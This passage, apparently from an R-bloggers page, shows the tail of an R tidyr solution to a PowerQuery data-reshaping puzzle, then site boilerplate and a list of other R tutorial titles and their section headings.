 pivot_longer(-Emp, names_to = c(".value", "Change"), names_sep = " ") %>%
 na.omit()

Validation

identical(result, test)
# [1] TRUE

Feel free to comment, share and contact me with advices, questions and your ideas how to improve anything. Contact me on Linkedin if you wish as well.

PowerQuery Puzzle solved with R was originally published in Numbers around us on Medium, where people are continuing the conversation by highlighting and responding to this story.

To leave a comment for the author, please follow the link and comment on their blog: Numbers around us - Medium.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: PowerQuery Puzzle solved with R

R-bloggers

Test title

optim Function in R

optim Function in R

R Shiny Highcharts – How to Create Interactive and Animated Shiny Dashboards

Table of contents:

Exploring R Shiny Highcharts Dashboard Elements

Building the R Shiny Highcharts Dashboard

Summary Stats Cards

Basic Dashboard Styling

Adding Basic R Highcharts

Adding a Highcharts Drilldown Chart

Full Source Code

app.R

www/styles.css

Summing up R Shiny Highcharts

Estimating Shooting Performance Unlikeliness

Introduction

Data

Reproducing and adapting the UN Population Projections by @ellis2013nz

Reproducing UN projections

Adjusting the starting point

Reproducing and adapting the UN Population Projections by @ellis2013nz

Reproducing UN projections

Adjusting the starting point

Compare numeric vectors in R

Compare numeric vectors in R

Example 1: we apply the ‘near’ function to our vectors

Example 2: Baisis User-Defined Tolerance

Summary

Highlights from ShinyConf 2024

Insightful Sessions and Memorable Speakers

Insightful Keynotes

New Open Source Package Announcement

Hex Logo Contest for Package Developers

What Package R You? Quiz

Redesign of Rhinoverse

Conclusion

Things that can go wrong when using renv

Binaries vs building from source

Beyond renv scope: incompatibility with system dependency versions

Expenditure-Based and Multivariate Weighted Indices: An R Package to Calculate CPI and Inflation

Conclusion

Why Use emWeightedCPI?

Get Started with emWeightedCPI Today!

CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0

FIN

Notes on Citing R and R Packages

Which software to cite

Where to get citation information

How to cite and version R and R packages

Examples

Exploring Data with TidyDensity’s tidy_mcmc_sampling()

Introduction

Understanding MCMC

Introducing tidy_mcmc_sampling()

Usage Example

Key Arguments

Visualizing Results

Try It Yourself!

Extract values from vector in R: dplyr

Extract values from vector in R

Example 1: nth Function

Example 2: nth Function with Negative Value

Example 3: first Function

Example 4: last Function

Conclusion

Ainulindalë in R: Orchestrating Data Pipelines for World Creation

Preparing the Instruments: Setting Up Your R Environment

Choosing the Right Libraries

Organizing Your Workspace

Project Management Practices

Gathering the Voices: Collecting Data

Understanding Data Sources

Using R to Import Data

Practical Tips for Efficient Data Collection

Refining the Harmony: Cleaning Data

Identifying Common Data Issues

Using R Packages for Data Cleaning

Techniques for Cleaning Data

`app.R`

`www/styles.css`

Introducing `tidy_mcmc_sampling()`

Understanding `check_duplicate_rows()`

Understanding `check_duplicate_rows()`